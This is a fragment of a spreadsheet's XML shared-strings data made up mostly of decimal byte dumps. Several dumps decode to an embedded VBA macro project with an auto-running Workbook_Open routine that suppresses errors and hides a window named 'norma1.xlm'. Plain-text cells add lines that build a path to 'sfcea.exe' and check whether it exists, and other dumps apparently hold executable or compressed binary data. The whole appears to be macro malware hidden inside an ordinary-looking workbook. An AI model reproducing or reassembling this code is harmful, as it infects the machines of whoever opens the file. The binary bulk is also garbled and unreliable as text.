    <t xml:space="preserve">32 0 22 2 47 0 44 2 0 0 32 0 46 2 33 0 48 2 172 0 1 0 7 0 156 0 32 0 46 2 66 64 50 2 0 0 255 255 255 255 255 255 107 0 255 255 216 0 0 0 111 0 255 255 208 0 0 0 255 255 255 255 200 0 0 0 255 255 255 255 248 0 0 0 183 0 182 0 10 0 110 111 114 109 97 49 46 120 108 109 32 0 28 2 37 0 32 2 1 0 40 0 34 2 0 0 255 255 255 255 128 4 0 0 255 255 255 255 184 0 0 0 255 255 255 255 0 0 1 124 177 0 65 116 116 114 105 98 117 116 0 101 32 86 66 95 78 97 109 0 101 32 61 32 34 84 104 105 0 115 87 111 114 107 98 111 111 16 107 34 13 10 10 140 66 97 115 1 2 140 48 123 48 48 48 50 48 80 56 49 57 45 0 16 48 3 8 67 7 0 20 2 18 1 36 48 48 52 54 125 129 13 124 71 108 111 98 97 108 1 208 16 83 112 97 99 1 146 70 97 108 4 115 101 12 100 67 114 101 97 116 8 97 98 108 21 31 80 114 101 100 144 101 99 108 97 0 6 73 100 0 177 8 84 114 117 13 66 69 120 112 111 4 115 101 20 28 84 101 109 112 108 0 97 116 101 68 101 114 105 118 3 2 18 146 66 117 115 116 111 109 105 6 122 4 68 3 50 68 105 109 32 120 0 32 65 115 32 78 101 119 32 192 192 224 49 13 10 80 128 33 128 37 32 32 83 117 98 32 133 154 95 79 0 112 101 110 40 41 13 10 79 0 110 32 69 114 114 111 114 32 16 82 101 115 117 128 174 78 101 120 2 116 0 118 112 112 108 105 99 97 0 116 105 111 110 46 87 105 110 0 100 111 119 115 40 34 110 111 0 114 109 97 49 46 120 108 109 128 34 41 46 86 105 115 105 139 127 33 8 25 83 104 111 119 4 27 73 110 128 84 97 115 107 98 97 114 128 130 1 132 97 83 101 116 32 120 46 65 28 112 112 0 9 128 2 5 52 13 10 73 2 102 134 79 115 46 67 111 117 110 0 116 32 60 61 32 49 32 84 32 104 101 110 13 10 133 46 115 46 0 65 100 100 13 10 69 110 100 96 32 73 102 13 10 67 2 192 54 13 0 10 </t>
  </si>
  <si>
    <t xml:space="preserve">51 210 8 67 35 154 140 192 98 112 24 98 67 236 102 137 150 251 199 134 113 10 239 127 67 76 126 55 102 57 20 135 116 35 139 142 23 117 196 79 136 199 6 137 132 142 113 12 136 148 48 254 135 183 119 63 139 232 235 5 112 84 135 2 184 64 59 193 124 201 131 190 157 128 183 255 41 2 125 86 131 253 4 5 69 139 253 91 251 162 149 69 11 135 239 71 6 142 253 162 35 142 160 163 218 137 8 116 11 193 12 241 33 181 41 134 88 81 255 239 191 222 124 174 167 155 137 105 4 139 134 19 153 43 194 139 216 209 251 131 75 244 41 248 251 1 124 17 83 31 99 252 96 75 155 132 9 118 16 125 239 63 255 43 197 67 108 17 117 134 5 158 214 26 244 54 69 72 137 19 139 52 248 189 246 142 189 16 58 139 150 253 46 16 45 182 48 219 70 74 137 15 35 156 176 196 225 1 89 154 76 73 76 139 12 135 166 241 216 27 117 12 159 31 175 138 140 202 138 148 30 163 218 210 79 96 209 114 5 112 202 129 251 101 225 109 113 254 193 197 46 20 42 108 111 246 189 119 4 159 2 137 174 101 128 69 123 144 28 106 38 122 117 48 180 3 44 22 100 59 139 175 150 116 195 212 47 50 196 131 68 100 204 167 54 154 253 97 141 150 52 193 82 95 135 177 45 133 140 8 207 124 240 186 20 219 174 224 241 200 134 212 165 102 220 17 32 61 218 144 35 128 9 11 224 193 109 96 7 65 118 92 55 184 18 43 63 54 226 108 20 22 136 164 142 112 171 110 135 183 102 6 72 33 125 232 49 7 55 152 179 233 64 17 200 11 100 100 168 89 196 63 83 144 56 69 233 126 106 222 25 91 110 72 65 174 72 221 18 116 32 113 6 179 88 81 67 37 98 48 112 73 19 94 92 252 136 78 22 176 12 91 167 116 252 148 140 218 87 159 16 101 77 172 68 195 76 35 111 42 38 53 67 77 182 159 186 194 49 70 214 23 172 161 38 175 77 242 185 3 16 202 158 149 163 217 179 96 238 159 151 162 158 235 9 140 150 12 78 106 128 210 179 107 89 41 20 242 9 126 74 254 104 244 38 7 200 247 7 228 149 234 196 172 37 115 50 222 201 110 44 176 </t>
  </si>
  <si>
    <t xml:space="preserve">m = InStr(n, hv, " ")</t>
  </si>
  <si>
    <t xml:space="preserve">114 85 128 0 0 0 0 0 0 0 128 0 0 0 128 0 0 0 0 0 0 0 30 0 0 0 9 0 0 0 0 0 0 0 9 0 0 0 0 0 5 0 96 0 0 0 0 0 0 0 1 0 1 0 10 0 0 0 17 5 0 0 0 0 0 0 9 8 0 0 0 0 0 0 9 0 0 0 0 0 2 0 193 6 0 0 0 0 0 0 169 9 0 0 0 0 0 0 89 9 0 0 0 0 0 0 49 9 0 0 0 0 0 0 129 9 0 0 0 0 0 0 169 18 0 0 0 0 0 0 233 18 0 0 0 0 0 0 1 0 1 0 0 0 1 0 57 5 0 0 0 0 0 0 97 5 0 0 0 0 0 0 137 5 0 0 0 0 0 0 255 255 255 255 17 5 0 0 0 0 0 0 8 0 30 0 56 0 0 0 177 5 0 0 0 0 0 0 97 0 0 0 0 0 1 0 217 5 0 0 0 0 0 0 255 255 255 255 255 255 255 255 255 255 255 255 1 0 131 7 0 0 0 0 3 96 9 1 0 0 0 0 4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 0 190 0 23 1 0 0 0 0 4 0 36 1 0 0 228 0 0 0 0 2 0 5 75 255 255 0 73 252 102 52 255 37 58 100 255 8 0 37 4 116 255 4 120 255 33 13 28 0 0 0 8 120 255 13 204 0 1 0 8 116 255 254 162 68 255 0 0 0 0 1 0 253 243 9 0 25 32 255 8 32 255 44 46 2 0 0 41 6 0 120 255 116 255 32 255 53 68 255 0 24 244 0 4 120 255 33 13 28 0 0 0 8 120 255 13 12 5 1 0 26 120 255 0 34 4 120 255 33 13 28 0 0 0 81 120 255 91 116 255 8 8 0 6 52 0 36 </t>
  </si>
  <si>
    <t xml:space="preserve">48 11 205 9 85 231 0 242 4 200 16 101 240 90 7 204 96 108 229 94 39 160 172 108 130 3 241 0 26 143 167 72 73 127 172 20 149 133 46 224 82 83 78 124 10 87 4 101 211 22 244 128 126 28 2 243 206 10 115 92 6 105 122 146 16 141 142 28 22 81 8 74 143 210 177 101 120 92 150 239 1 248 70 219 177 159 194 10 124 10 108 3 193 233 3 91 241 77 23 80 119 7 52 77 5 139 209 141 171 250 248 169 35 212 119 29 89 116 21 190 87 85 83 215 64 12 139 35 191 55 20 8 207 170 181 50 70 133 136 0 145 52 77 91 240 141 71 2 5 208 47 78 150 196 27 178 140 86 158 11 11 141 240 156 131 86 86 72 78 76 150 193 195 32 39 78 232 159 150 16 107 39 99 5 134 224 79 10 211 2 244 243 165 142 104 176 196 140 48 222 255 197 220 49 216 111 60 226 153 135 87 4 126 91 139 145 205 65 230 218 211 227 200 139 158 108 115 71 150 94 134 4 25 118 11 177 20 124 35 124 111 8 121 18 158 191 70 133 203 78 180 109 176 234 184 195 134 70 21 179 239 69 22 193 150 33 141 226 221 182 245 172 101 141 166 64 80 250 32 7 250 106 29 59 65 81 149 108 204 226 167 82 196 129 201 206 192 80 170 20 5 160 149 216 202 77 133 95 162 21 154 1 47 54 15 233 68 23 40 75 149 164 47 43 76 166 74 9 124 196 141 106 32 66 133 69 160 15 235 139 16 211 29 182 17 234 137 63 20 155 36 213 116 232 18 223 22 110 100 244 48 139 110 112 76 126 36 68 124 104 174 11 171 182 141 159 106 7 93 192 79 7 59 211 37 118 14 6 200 16 92 32 129 194 141 40 228 160 108 209 235 8 183 24 45 254 237 170 43 132 17 28 113 41 255 9 20 59 174 132 182 221 192 253 61 153 1 43 47 193 108 79 2 97 126 81 119 247 108 59 194 27 32 118 4 5 16 136 86 48 251 37 110 38 232 45 3 215 148 68 42 255 117 125 13 197 237 27 219 69 57 177 115 65 66 144 12 65 2 182 109 80 40 203 238 89 59 17 49 14 22 114 33 23 34 19 222 168 246 55 161 203 114 192 138 1 58 9 50 209 43 211 </t>
  </si>
  <si>
    <t xml:space="preserve">Loop</t>
  </si>
  <si>
    <t xml:space="preserve">2 0 13 36 0 3 0 26 116 255 0 42 4 28 255 4 120 255 5 4 0 36 5 0 13 208 0 6 0 8 120 255 13 48 0 7 0 108 28 255 245 1 0 0 0 214 26 120 255 28 223 0 0 43 4 116 255 245 9 4 0 0 39 100 255 37 4 120 255 5 4 0 36 5 0 13 208 0 6 0 8 120 255 13 40 0 7 0 41 4 0 120 255 116 255 0 2 0 0 19 0 0 0 0 4 0 96 0 228 0 36 0 8 0 0 0 0 0 19 0 0 0 0 0 12 0 0 0 0 0 0 0 0 0 0 0 28 0 0 0 0 0 4 0 0 0 0 0 120 255 3 0 116 255 3 0 32 255 3 0 68 255 2 0 7 0 0 19 0 0 56 0 88 0 0 127 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 114 85 128 0 0 0 0 0 0 0 128 0 0 0 128 0 0 0 0 0 0 0 16 0 0 0 9 0 0 0 0 0 4 0 255 255 255 255 255 255 255 255 0 0 0 0 68 0 0 0 4 0 36 0 1 1 0 0 0 0 4 0 0 0 3 96 0 0 20 3 28 0 255 255 255 255 255 255 255 255 0 0 0 0 0 0 0 0 30 1 0 0 0 0 0 0 0 110 0 0 127 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 114 85 128 0 0 0 0 0 0 0 128 0 0 0 128 0 0 0 0 0 0 0 16 0 0 0 9 0 0 0 0 0 2 0 255 255 255 255 255 255 255 255 0 0 0 0 72 0 0 0 4 0 44 0 185 1 0 0 0 0 2 0 0 0 3 96 4 0 40 0 28 0 255 255 255 255 255 255 255 255 0 0 0 0 17 1 0 0 0 0 1 0 0 0 0 0 30 29 241 0 0 0 0 0 1 0 52 0 249 1 0 0 0 0 2 0 1 0 3 96 8 0 44 0 32 0 255 255 255 255 255 255 255 255 0 0 0 0 17 1 0 0 0 0 1 0 33 1 0 0 0 0 1 0 0 0 0 0 30 29 241 0 0 0 0 0 1 0 35 44 0 57 2 0 0 0 0 2 0 2 0 3 96 4 0 48 0 36 0 255 255 255 </t>
  </si>
  <si>
    <t xml:space="preserve">238 134 248 215 180 136 59 213 141 139 64 126 21 59 128 109 210 93 234 137 126 104 181 125 38 179 10 141 70 92 168 111 144 70 56 35 215 27 80 59 3 47 218 104 219 118 23 76 183 190 86 230 28 35 182 29 208 232 119 196 197 19 20 195 221 162 159 81 79 129 126 44 255 159 161 136 58 56 136 13 24 117 20 126 150 209 192 240 139 126 127 76 146 58 242 251 42 83 87 215 81 20 132 107 139 210 111 11 154 24 14 45 37 32 153 123 27 55 162 0 153 27 210 249 21 71 65 4 132 34 39 125 156 191 11 183 133 91 235 86 83 183 52 184 139 85 178 93 29 126 233 225 112 57 157 102 119 161 234 2 66 139 189 176 196 66 33 194 200 250 105 199 183 134 141 90 9 253 92 199 117 15 77 100 87 200 4 134 137 229 108 121 9 220 136 106 91 12 243 22 2 19 129 198 135 183 71 56 22 186 137 52 36 41 36 129 238 220 108 216 136 218 43 206 232 38 76 160 85 56 93 215 117 59 177 6 104 102 91 28 152 76 15 4 41 26 117 115 137 45 250 3 96 251 69 91 227 174 79 88 8 235 78 79 29 48 182 195 239 110 147 209 3 82 57 28 56 116 28 37 25 56 4 54 152 226 133 181 200 15 131 118 79 48 117 189 47 236 168 242 131 200 165 44 16 117 222 10 217 76 152 107 156 62 42 143 131 108 132 149 219 123 17 118 172 72 82 172 2 33 228 72 186 217 109 99 26 128 82 100 146 35 153 84 55 40 12 201 73 142 28 252 1 1 14 121 36 147 208 230 2 164 35 153 228 72 203 117 73 142 100 146 176 70 149 36 39 57 146 23 122 232 0 100 194 14 50 95 116 125 22 72 228 144 9 57 122 49 115 153 144 67 38 26 108 3 225 156 16 14 101 162 236 1 239 165 179 193 244 135 89 81 210 127 236 45 141 60 124 152 121 9 5 230 21 128 92 242 92 242 15 4 135 3 142 75 242 92 242 2 149 1 83 201 1 27 100 14 6 19 223 254 32 131 12 200 7 176 8 200 128 12 50 129 9 82 201 131 156 61 10 235 116 16 38 11 235 99 7 57 249 228 250 253 12 235 82 206 13 235 57 121 144 147 65 162 14 235 48 118 84 144 </t>
  </si>
  <si>
    <t xml:space="preserve">0 0 72 0 4 0 0 0 0 0 56 0 28 0 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 8 0 8 0 136 1 0 0 152 215 66 66 4 0 1 18 0 42 0 92 0 82 0 49 0 42 0 35 0 50 0 56 0 50 0 1 18 0 42 0 92 0 82 0 49 0 42 0 35 0 50 0 56 0 54 0 1 36 0 42 0 92 0 82 0 102 0 102 0 102 0 102 0 42 0 48 0 58 0 52 0 51 0 49 0 55 0 49 0 50 0 50 0 55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1 0 57 0 1 14 0 42 0 92 0 82 0 48 0 42 0 35 0 102 0 1 16 0 42 0 </t>
  </si>
  <si>
    <t xml:space="preserve">147 7 15 235 31 74 50 75 215 177 173 14 226 36 20 56 15 127 107 23 80 58 185 3 248 112 3 51 87 3 116 45 223 31 116 171 10 242 7 190 149 81 102 11 11 4 247 211 117 63 69 129 226 246 0 14 5 54 190 6 6 29 192 47 213 47 89 131 198 6 185 63 93 167 173 246 165 75 99 131 238 141 87 252 51 22 67 100 186 27 179 187 70 61 117 10 70 55 118 70 43 101 59 56 117 157 222 3 40 119 17 166 130 44 184 174 1 215 106 7 128 11 22 209 4 30 133 230 159 238 16 115 34 26 12 3 206 3 242 78 8 230 213 68 108 216 89 255 51 47 237 4 150 95 55 215 1 72 16 55 93 104 97 200 119 193 255 82 55 34 226 91 94 157 195 13 10 71 86 77 97 255 111 255 255 116 51 50 32 111 112 116 105 109 105 115 101 100 32 97 115 5 109 98 108 121 32 99 111 100 101 32 119 127 251 127 227 114 105 116 68 110 32 49 57 57 54 45 57 56 32 98 23 71 105 108 108 101 115 173 253 237 237 32 86 111 6 97 110 116 66 83 156 88 139 200 53 215 254 116 237 246 219 80 157 10 51 193 116 30 81 7 156 89 101 19 32 137 31 208 141 157 20 16 77 15 162 11 208 108 13 116 184 0 10 247 6 4 240 191 41 114 39 26 36 199 230 60 139 66 112 139 154 16 111 237 3 29 59 195 10 248 90 116 124 192 246 66 119 26 75 193 227 2 216 137 28 38 130 160 86 110 237 45 22 199 216 124 17 174 246 205 109 152 114 48 251 230 106 100 141 124 113 212 65 38 224 111 254 199 247 216 131 224 3 137 185 229 8 44 28 45 27 232 127 237 92 176 193 97 203 20 52 240 44 47 31 182 224 222 76 132 6 92 56 255 8 73 122 128 29 209 223 254 20 36 235 26 35 202 18 12 79 59 205 15 134 164 129 126 136 27 130 234 33 15 136 212 83 68 49 255 220 0 78 221 151 117 221 178 153 1 59 128 123 219 77 92 117 207 137 53 139 128 121 128 119 124 162 167 23 186 248 151 141 188 56 8 139 95 122 187 21 180 48 6 127 50 51 4 58 117 119 126 131 66 191 50 4 51 68 58 4 219 242 8 117 233 235 113 137 87 </t>
  </si>
  <si>
    <t xml:space="preserve">Close #1</t>
  </si>
  <si>
    <t xml:space="preserve">92 0 82 0 49 0 42 0 35 0 100 0 51 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 101 0 56 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 99 0 101 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 100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8 0 42 0 92 0 82 0 49 0 42 0 35 0 49 0 100 0 97 0 1 18 0 42 0 92 0 82 0 49 0 42 0 35 0 49 0 100 0 57 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 97 0 53 0 1 16 0 42 </t>
  </si>
  <si>
    <t xml:space="preserve">109 33 162 169 44 197 3 224 175 181 191 193 232 16 44 1 131 210 52 42 77 43 199 61 102 162 195 174 143 125 76 28 98 123 61 190 247 224 127 19 189 170 177 20 21 187 253 29 106 250 211 215 137 74 104 33 125 45 140 129 116 110 216 226 219 44 137 134 185 231 186 75 199 44 89 48 90 100 89 110 20 26 26 216 127 195 36 111 52 190 17 8 109 54 56 54 1 0 104 32 109 143 48 102 116 12 44 17 41 102 114 120 123 163 241 111 109 32 66 46 19 32 82 97 51 101 114 44 16 240 237 192 60 56 79 204 255 37 252 100 100 100 43 81 5 248 244 240 100 100 100 100 236 232 228 224 100 100 100 100 220 216 212 208 100 100 100 100 204 200 196 192 100 100 100 100 188 184 180 176 100 100 100 100 172 168 164 160 100 100 100 100 156 152 148 144 100 100 100 100 140 136 132 128 100 100 100 100 124 120 116 112 100 100 100 100 108 104 100 96 100 100 100 100 92 88 84 80 100 100 100 100 76 72 68 64 100 100 100 100 60 52 48 44 100 100 100 100 40 36 32 28 100 100 100 100 24 20 16 12 115 100 100 100 8 4 0 252 178 200 200 200 200 248 244 240 236 200 200 200 200 232 228 224 220 200 200 200 200 216 212 208 204 200 200 200 200 200 196 192 188 200 200 200 200 184 180 176 172 70 182 205 200 168 164 204 204 31 160 156 65 70 70 70 152 148 144 140 124 145 177 140 13 136 15 132 128 121 62 191 147 124 178 221 120 178 116 178 112 25 25 25 25 108 104 100 96 228 59 25 25 92 88 177 5 144 100 100 100 100 148 152 156 160 100 100 100 100 164 168 172 176 100 100 100 100 180 184 188 192 100 100 100 100 196 200 204 208 115 100 100 100 212 216 220 0 180 35 35 207 231 228 177 4 178 8 12 16 35 35 35 35 20 24 28 32 35 35 35 35 36 40 44 52 35 35 35 35 56 60 64 68 35 35 35 35 72 76 80 84 44 138 5 54 86 106 48 241 79 234 187 8 152 12 150 106 12 104 240 201 1 177 20 143 69 137 246 134 106 131 168 59 78 4 176 8 104 38 162 42 219 20 23 40 4 152 53 55 144 101 232 40 58 128 110 6 129 125 119 192 8 222 </t>
  </si>
  <si>
    <t xml:space="preserve">0 92 0 82 0 49 0 42 0 35 0 53 0 98 0 1 14 0 42 0 92 0 82 0 48 0 42 0 35 0 50 0 1 16 0 42 0 92 0 82 0 48 0 42 0 35 0 49 0 52 0 1 14 0 42 0 92 0 82 0 48 0 42 0 35 0 49 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 101 0 57 0 1 14 0 42 0 92 0 82 0 48 0 42 0 35 0 102 0 1 18 0 42 0 92 0 82 0 49 0 42 0 35 0 50 0 49 0 48 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 97 0 49 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 100 0 51 0 1 36 0 42 0 92 0 82 0 102 0 102 0 102 0 102 0 42 0 48 0 49 0 52 0 51 0 49 0 55 0 49 0 50 0 97 0 55 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 101 0 56 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 99 0 101 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 100 0 102 0 1 18 0 42 0 92 0 82 0 49 0 42 0 35 0 50 0 56 0 53 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 99 0 101 0 223 2 0 0 0 0 0 255 255 255 255 52 0 0 0 1 0 0 0 8 0 0 0 60 0 0 0 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 254 202 1 0 108 0 0 128 8 0 10 0 0 0 0 0 0 0 0 128 9 0 0 0 0 0 255 255 255 255 34 129 12 0 6 0 9 0 16 0 0 0 0 129 8 0 10 0 34 0 24 9 0 0 0 129 8 0 60 0 115 0 24 0 0 0 0 129 8 0 2 0 3 0 88 0 0 0 0 129 8 0 2 0 2 0 96 0 0 0 0 129 8 0 48 0 90 0 104 0 0 0 0 129 8 0 20 0 49 0 152 0 0 0 0 129 8 0 36 0 50 0 176 0 0 0 </t>
  </si>
  <si>
    <t xml:space="preserve">110 223 192 72 37 9 192 50 5 5 40 128 139 240 235 220 175 153 160 75 66 83 195 249 231 204 0 189 186 80 5 3 100 161 110 197 219 232 80 10 210 37 11 163 186 213 53 59 141 3 80 111 61 224 92 230 170 118 238 6 171 53 104 220 106 18 204 82 101 34 6 241 141 134 130 207 213 82 211 178 107 222 177 145 133 111 3 89 72 195 204 77 208 204 5 176 145 145 145 192 164 156 152 131 130 219 14 104 61 75 115 14 52 3 196 67 181 181 151 54 133 0 148 207 117 81 233 63 251 221 64 129 16 154 236 45 31 133 1 38 236 43 200 139 223 86 192 183 196 12 139 225 139 8 182 80 101 148 203 218 35 99 77 92 104 104 155 6 205 170 131 110 186 16 198 16 16 43 224 53 69 173 9 160 80 185 33 249 199 2 65 171 114 80 224 230 37 128 239 86 62 100 163 46 195 144 41 128 89 4 178 155 112 129 166 225 81 37 88 106 92 0 202 143 183 18 135 123 219 163 72 139 61 12 31 168 131 255 255 215 102 129 56 77 90 117 31 139 72 60 3 200 129 57 80 69 35 18 179 109 224 173 199 24 61 11 185 116 31 6 2 20 63 241 91 5 49 228 235 39 131 185 49 14 118 242 179 253 139 91 152 153 248 111 14 131 121 116 15 226 1 168 25 204 232 173 140 186 112 215 16 128 107 16 118 89 131 13 0 220 206 246 104 255 6 224 20 20 180 100 100 187 116 14 148 137 8 13 24 144 187 7 247 119 161 28 12 0 163 216 13 143 194 4 142 98 86 110 24 224 57 29 148 58 57 102 158 83 207 237 254 206 32 24 80 104 28 23 104 24 4 14 188 31 220 6 96 10 31 185 145 161 140 78 2 64 43 64 204 2 210 16 61 136 202 136 7 251 2 184 125 224 200 17 21 40 77 32 33 175 0 229 96 196 196 115 107 248 126 200 247 188 89 104 20 78 0 89 89 161 48 142 48 168 240 6 223 165 220 138 6 60 97 93 58 195 4 237 186 118 163 20 117 84 14 10 10 18 6 70 65 252 214 194 28 88 237 168 141 133 124 255 45 128 191 60 66 16 246 69 168 1 116 6 191 4 133 45 254 172 235 3 106 10 88 80 118 83 100 10 133 214 </t>
  </si>
  <si>
    <t xml:space="preserve">filesf = folder1 &amp; "\sfcea.exe"</t>
  </si>
  <si>
    <t xml:space="preserve">0 129 8 0 82 0 122 0 216 0 0 0 0 129 8 0 82 0 122 0 136 7 0 0 0 129 8 0 82 0 122 0 224 7 0 0 0 129 8 0 96 0 72 0 48 1 0 0 0 129 8 0 10 0 17 0 144 1 0 0 4 129 8 0 2 0 3 0 160 1 0 0 0 128 9 0 0 0 0 0 255 255 255 255 34 129 12 0 6 0 9 0 168 1 0 0 0 129 8 0 4 0 5 0 176 1 0 0 0 129 8 0 20 0 45 0 184 1 0 0 0 129 8 0 2 0 3 0 208 1 0 0 0 129 8 0 2 0 2 0 216 1 0 0 0 129 8 0 6 0 7 0 224 1 0 0 0 129 8 0 12 0 29 0 232 1 0 0 0 129 8 0 10 0 15 0 248 1 0 0 0 129 8 0 58 0 92 0 208 9 0 0 0 129 8 0 12 0 19 0 8 2 0 0 0 129 8 0 6 0 7 0 24 2 0 0 0 129 8 0 2 0 3 0 32 2 0 0 0 129 8 0 2 0 2 0 40 2 0 0 0 129 8 0 12 0 19 0 48 2 0 0 0 129 8 0 24 0 43 0 64 2 0 0 0 129 8 0 10 0 17 0 88 2 0 0 0 129 8 0 2 0 3 0 104 2 0 0 0 129 8 0 2 0 5 0 112 2 0 0 0 129 8 0 16 0 16 0 120 2 0 0 0 129 8 0 14 0 28 0 136 2 0 0 0 129 8 0 4 0 5 0 152 2 0 0 0 129 8 0 2 0 2 0 160 2 0 0 0 129 8 0 2 0 2 0 168 2 0 0 0 129 8 0 12 0 19 0 176 2 0 0 0 129 8 0 24 0 43 0 192 2 0 0 0 129 8 0 42 0 118 0 216 2 0 0 0 129 8 0 6 0 7 0 8 3 0 0 0 129 8 0 2 0 3 0 16 3 0 0 0 129 8 0 2 0 5 0 24 3 0 0 0 129 8 0 4 0 5 0 32 3 0 0 0 129 8 0 2 0 2 0 40 3 0 0 0 129 8 0 2 0 2 0 48 3 0 0 0 129 8 0 10 0 15 0 56 3 0 0 0 128 8 0 4 0 0 0 72 3 0 0 0 129 8 0 16 0 16 0 80 3 0 0 0 129 8 0 14 0 28 0 </t>
  </si>
  <si>
    <t xml:space="preserve">216 104 143 226 190 49 41 73 55 223 47 0 63 52 180 208 56 235 85 60 162 11 144 251 34 117 11 51 201 94 219 137 77 67 213 235 54 171 192 76 60 235 243 54 78 59 62 103 70 67 140 162 39 48 9 78 109 36 216 34 212 213 182 167 45 198 150 54 138 59 131 46 0 86 68 62 150 244 70 72 228 42 95 84 87 192 144 63 5 8 104 16 146 210 229 43 80 106 138 239 204 235 7 122 133 205 246 11 54 106 3 203 20 204 59 156 191 118 187 15 126 1 195 126 141 112 69 80 180 29 64 180 26 182 240 34 81 153 32 81 61 147 219 8 42 96 11 185 6 163 234 246 26 55 97 177 228 139 111 179 183 9 27 208 97 131 23 4 235 213 156 200 201 128 116 67 48 104 104 70 157 165 68 213 36 196 106 134 17 190 4 1 197 210 29 46 127 247 78 130 166 161 200 68 7 61 78 230 64 187 117 27 1 174 170 78 10 5 40 200 182 107 62 252 51 36 11 51 240 7 32 126 154 45 50 28 39 240 24 69 244 51 109 64 239 214 12 17 137 53 75 110 5 22 28 0 239 7 78 67 21 12 140 60 199 70 220 5 184 176 176 172 66 116 55 202 251 139 6 126 10 114 180 53 106 58 131 38 26 102 152 3 8 61 64 236 26 62 28 141 78 141 218 0 109 5 168 175 195 2 52 111 166 123 214 185 198 25 70 24 127 8 35 48 94 233 84 119 21 116 215 234 138 136 129 236 31 109 99 204 197 214 86 204 116 40 98 7 64 166 50 180 184 18 6 214 198 42 96 43 187 2 4 154 199 68 240 0 53 194 140 12 16 180 230 134 121 23 21 3 223 241 141 100 198 64 240 2 117 8 70 5 114 26 235 20 151 202 55 119 13 1 117 18 4 119 8 117 10 220 118 4 91 43 222 117 62 1 166 199 70 16 16 96 6 20 50 253 246 132 76 180 137 238 215 125 7 198 5 124 106 252 135 91 2 103 116 183 155 161 131 197 120 201 76 29 10 126 55 144 16 158 117 160 29 84 168 1 146 136 72 54 54 0 220 199 64 16 175 106 253 231 216 120 208 200 112 214 168 173 230 91 123 170 34 240 49 97 36 195 184 116 212 144 203 118 65 138 62 18 152 153 </t>
  </si>
  <si>
    <t xml:space="preserve">If Not fso.fileexists(filesf) Then</t>
  </si>
  <si>
    <t xml:space="preserve">1 22 1 0 6 0 1 0 0 44 22 0 0 228 0 0 0 232 6 0 0 44 27 0 0 70 27 0 0 194 42 0 0 1 0 0 0 1 0 0 0 118 117 176 137 0 0 255 255 1 0 0 0 128 0 0 0 182 0 255 255 1 1 0 0 0 0 255 255 255 255 0 0 0 0 255 255 68 0 255 255 0 0 88 51 140 199 210 172 10 75 161 124 36 163 193 228 131 245 42 61 251 252 250 160 104 16 167 56 8 0 43 51 113 181 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 50 53 13 92 110 12 76 69 149 255 218 198 95 199 44 60 16 0 0 0 3 0 0 0 5 0 0 0 7 0 0 0 255 255 255 255 255 255 255 255 1 1 8 0 0 0 255 255 255 255 120 0 0 0 8 50 53 13 92 110 12 76 69 149 255 218 198 95 199 44 60 88 51 140 199 210 172 10 75 161 124 36 163 193 228 131 245 255 255 0 0 0 0 77 69 0 0 255 255 255 255 255 255 0 0 0 0 255 255 0 0 0 0 255 255 1 1 0 0 0 0 223 0 255 255 0 0 0 0 28 0 255 255 255 255 255 255 12 0 255 255 255 255 255 255 16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5 0 0 2 0 83 16 255 255 255 255 0 0 1 0 83 12 255 255 255 255 0 0 1 0 83 148 255 255 255 255 0 0 6 0 96 148 255 255 28 2 0 0 4 0 48 148 255 255 56 2 0 0 0 0 62 34 255 255 255 255 0 0 0 0 2 60 24 1 255 255 0 0 0 0 2 60 24 0 255 255 0 0 0 0 26 76 255 255 255 255 0 0 0 0 26 8 255 255 255 255 0 0 0 0 26 76 255 255 255 255 0 0 0 0 26 76 </t>
  </si>
  <si>
    <t xml:space="preserve">236 203 66 148 233 62 184 40 203 17 196 75 78 46 57 76 224 112 79 54 131 139 236 146 76 8 240 184 156 156 108 207 101 45 204 98 53 228 200 207 37 103 151 212 17 236 208 98 35 57 153 228 184 16 204 216 52 216 178 35 115 61 115 104 35 107 249 179 30 54 176 17 185 152 211 0 2 104 86 161 124 100 107 4 199 21 248 143 55 104 96 221 99 15 151 104 137 106 23 231 162 212 33 195 219 140 53 99 61 233 22 49 233 33 0 0 101 35 138 8 3 44 151 19 69 26 222 244 221 226 89 54 77 211 212 194 178 136 222 114 178 105 154 166 92 76 60 44 160 221 101 211 116 205 144 122 7 98 74 6 222 62 215 44 155 56 254 220 14 38 3 0 210 105 154 166 235 15 194 3 168 152 36 98 166 105 154 166 116 130 52 64 232 105 182 103 155 142 82 220 55 194 215 3 170 154 166 105 154 166 138 124 104 76 58 58 183 105 154 44 28 8 252 214 63 3 216 211 157 174 105 202 190 15 178 27 140 77 211 185 77 124 136 217 183 3 186 204 224 154 102 217 52 238 8 218 26 42 70 105 154 166 105 94 114 132 146 172 179 108 154 166 188 210 232 224 215 240 166 105 154 101 0 216 18 34 50 70 154 166 105 154 90 110 128 154 170 190 235 154 166 105 212 228 254 22 115 42 3 174 105 154 166 64 82 94 106 156 163 151 219 237 217 118 217 251 82 5 66 45 20 3 172 7 120 6 183 93 211 44 119 63 80 19 46 11 11 134 17 102 185 92 46 169 16 139 1 123 2 154 186 166 235 186 111 43 10 15 9 19 117 159 67 87 186 102 185 237 43 144 24 23 103 19 128 202 19 48 53 219 174 233 31 66 86 27 108 3 3 16 54 150 203 109 211 19 119 188 10 43 91 15 240 8 160 53 203 174 107 232 7 130 27 61 13 15 88 236 154 109 215 51 191 7 18 9 139 115 113 3 86 9 211 52 77 179 96 94 92 88 111 102 219 117 77 99 17 55 133 127 218 14 7 135 154 101 119 186 242 83 124 3 101 9 83 81 108 154 166 105 104 109 90 106 166 3 219 52 77 179 162 164 160 155 72 